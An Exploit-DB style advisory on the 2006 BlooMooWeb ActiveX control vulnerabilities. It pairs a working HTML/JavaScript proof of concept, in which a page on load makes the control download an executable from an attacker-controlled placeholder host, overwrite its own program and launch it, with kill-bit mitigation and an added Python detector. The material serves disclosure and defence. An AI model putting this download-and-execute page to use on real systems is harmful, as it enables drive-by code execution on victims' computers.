Vendor: BlooMooWeb ActiveX Control
By: SecurityFocus
CVSS: 9.3 (HIGH)
Impact: Arbitrary File Download, Arbitrary Code Execution, Arbitrary File Deletion
CWE: 20
Product Name: BlooMooWeb ActiveX Control
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

BlooMooWeb ActiveX Control Multiple Vulnerabilities

An attacker who lures a user into loading a malicious web page can exploit these issues to download arbitrary files onto the victim's disk, execute arbitrary code within the context of the affected application, and delete arbitrary files. The proof of concept below chains the first two issues. Its JavaScript function spawn2() calls the control's GetInstallationDir() method to learn where the application is installed, then calls BW_DownloadFile() with three arguments: an attacker-controlled URL, a destination path of that directory plus "BlooMooWEB.exe" (so the download overwrites the control's own executable), and the name of a page function, callback001(), which the control invokes with download status messages. When callback001() receives the message code 'DOWNLOAD_COMPLETE' it calls BW_LaunchGame(), which runs the executable in the installation directory, by then the attacker's binary. The chain starts from the page's onload handler, so in a browser that instantiates the control without prompting, visiting the page is the only user action required. The arbitrary file-deletion issue is not exercised by this proof of concept.

Mitigation:

Upgrade to the latest version of the BlooMooWeb ActiveX control. Where the update cannot be deployed, set the kill bit for the control's CLSID {22E9EFBA-114C-4DA0-AE72-D8F2C7138002} (a DWORD named "Compatibility Flags" with value 0x400 under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{22E9EFBA-114C-4DA0-AE72-D8F2C7138002}) so that Internet Explorer refuses to instantiate the control from web content.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/20827/info

BlooMooWeb ActiveX control is prone to multiple vulnerabilities, including:

- an arbitrary file-download issue
- an arbitrary code-execution issue
- an arbitrary file-deletion issue. 

An attacker can exploit these issues to download arbitrary files, execute arbitrary code within the context of the affected application, and delete arbitrary files.

<html>
<head>
<script language="JavaScript">

// Attacker-controlled URL; the control fetches it on behalf of any page that can script it.
var binaryUrl="http://some_attacker_controlled_domain/attackerfile.exe";

function spawn2()
{
        // Ask the control where it is installed, then build a destination path
        // that overwrites the control's own executable in that directory.
        aa1=o2obj.GetInstallationDir(null);
        aa2="BlooMooWEB.exe";
        // BW_DownloadFile(url, localPath, callbackName): the third argument names
        // the page function the control invokes with download status messages.
        o2obj.BW_DownloadFile(binaryUrl,aa1+aa2,"callback001");
}

function callback001( msgCode, param1, param2, param3 )
{
        if(msgCode == 'DOWNLOAD_COMPLETE' )
        {
                // Launch the executable in the installation directory, which is now
                // the attacker's binary. The PoC passes a dummy string as the argument.
                o2obj.BW_LaunchGame("treleferekuku");
        }
}

</script>
</head>

<body onload="spawn2()">
<!-- Zero-size instance of the vulnerable control, scripted above as o2obj. -->
<object ID="o2obj" WIDTH=0 HEIGHT=0
    CLASSID="CLSID:22E9EFBA-114C-4DA0-AE72-D8F2C7138002">
</object>
</body>
</html>
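For defenders, the useful artefacts in this advisory are the CLSID and the three method names the proof of concept chains. The following Python script is an added example, not code from the original advisory or from the vendor: it scans HTML (a page captured by a web proxy, or a file on disk) for object tags bound to that CLSID and for scripting of GetInstallationDir, BW_DownloadFile and BW_LaunchGame on those objects, and rates the page by how much of the chain is present. The sample pages inside it are constructed for the demonstration, and the all-zero CLSID in the benign sample is a placeholder, not a real control.

```python
"""Flag HTML that embeds the BlooMooWeb ActiveX control and scripts its
download/launch methods.

Added example for this advisory, not code from the original PoC or the
vendor. It recognises the CLSID published in the PoC and the three method
names the PoC calls; the sample pages below are constructed for the demo.
"""
import re
from dataclasses import dataclass, field

# CLSID from the PoC's <object> tag. Braces and case are normalised before comparison.
BLOOMOO_CLSID = "22E9EFBA-114C-4DA0-AE72-D8F2C7138002"

# Control methods the PoC chains: locate install dir -> write file there -> run it.
RISKY_METHODS = ("GetInstallationDir", "BW_DownloadFile", "BW_LaunchGame")

OBJECT_TAG_RE = re.compile(r"<object\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""", re.IGNORECASE)
CLSID_RE = re.compile(r"clsid:\s*\{?([0-9A-F-]{36})\}?", re.IGNORECASE)


@dataclass
class Finding:
    instances: int = 0                                   # <object> tags bound to the CLSID
    object_ids: list = field(default_factory=list)       # their id attributes, if any
    methods_called: list = field(default_factory=list)   # risky methods scripted on those ids

    def severity(self) -> str:
        if self.instances == 0:
            return "none"
        if "BW_DownloadFile" in self.methods_called and "BW_LaunchGame" in self.methods_called:
            return "high"    # download-then-launch chain: arbitrary code execution
        if self.methods_called:
            return "medium"  # a single risky method (e.g. download to an arbitrary path)
        return "low"         # control instantiated but not scripted on this page


def parse_attrs(tag: str) -> dict:
    """Return lower-cased attribute name -> value for one start tag."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def scan_page(html: str) -> Finding:
    finding = Finding()
    for tag in OBJECT_TAG_RE.findall(html):
        attrs = parse_attrs(tag)
        m = CLSID_RE.search(attrs.get("classid", ""))
        if m and m.group(1).upper() == BLOOMOO_CLSID:
            finding.instances += 1
            if "id" in attrs:
                finding.object_ids.append(attrs["id"])
    # Match id.method( and id["method"]( for every object bound to the CLSID.
    for obj_id in finding.object_ids:
        for method in RISKY_METHODS:
            pattern = (rf"\b{re.escape(obj_id)}\s*(?:\.\s*{method}"
                       rf"|\[\s*[\"']{method}[\"']\s*\])\s*\(")
            if re.search(pattern, html) and method not in finding.methods_called:
                finding.methods_called.append(method)
    return finding


# Constructed sample that mirrors the PoC's structure (same CLSID, same call chain).
MALICIOUS_PAGE = """<html><head><script language="JavaScript">
var binaryUrl="http://some_attacker_controlled_domain/attackerfile.exe";
function spawn2(){
  aa1=o2obj.GetInstallationDir(null);
  o2obj.BW_DownloadFile(binaryUrl,aa1+"BlooMooWEB.exe","callback001");
}
function callback001(msgCode,p1,p2,p3){
  if(msgCode=='DOWNLOAD_COMPLETE'){ o2obj.BW_LaunchGame("treleferekuku"); }
}
</script></head><body onload="spawn2()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
    CLASSID="CLSID:22E9EFBA-114C-4DA0-AE72-D8F2C7138002"></object>
</body></html>"""

# Constructed sample: control embedded (lower-case, braced CLSID) but never scripted.
EMBED_ONLY_PAGE = '<object id="game" classid="clsid:{22e9efba-114c-4da0-ae72-d8f2c7138002}"></object>'

# Constructed sample: a placeholder CLSID with the same method names; must not fire.
BENIGN_PAGE = ('<object id="o2obj" classid="clsid:00000000-0000-0000-0000-000000000000"></object>'
               '<script>o2obj.BW_LaunchGame("x");</script>')

if __name__ == "__main__":
    for name, page in (("malicious", MALICIOUS_PAGE), ("embed-only", EMBED_ONLY_PAGE),
                       ("benign", BENIGN_PAGE)):
        f = scan_page(page)
        print(f"{name:>10}: severity={f.severity()} ids={f.object_ids} methods={f.methods_called}")
```

This is a regex pass, not an HTML or JavaScript parser. Aliasing the object (var o = o2obj;) or assembling method names at runtime evades the method check, so the CLSID match alone should be treated as the reliable signal and the severity rating as a triage hint.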